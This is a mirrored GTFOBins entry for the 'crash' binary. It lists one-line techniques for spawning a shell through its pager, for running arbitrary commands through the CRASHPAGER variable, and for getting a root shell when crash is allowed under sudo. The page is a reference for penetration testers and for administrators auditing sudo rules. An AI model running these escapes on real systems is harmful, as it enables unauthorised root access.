1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 00:06:03 +02:00
GTFOBins.github.io/_gtfobins/crash.md
2020-03-15 13:10:31 +01:00

475 B

functions
shell command sudo
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. crash -h !sh
code
COMMAND='/usr/bin/id' CRASHPAGER="$COMMAND" crash -h
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. sudo crash -h !sh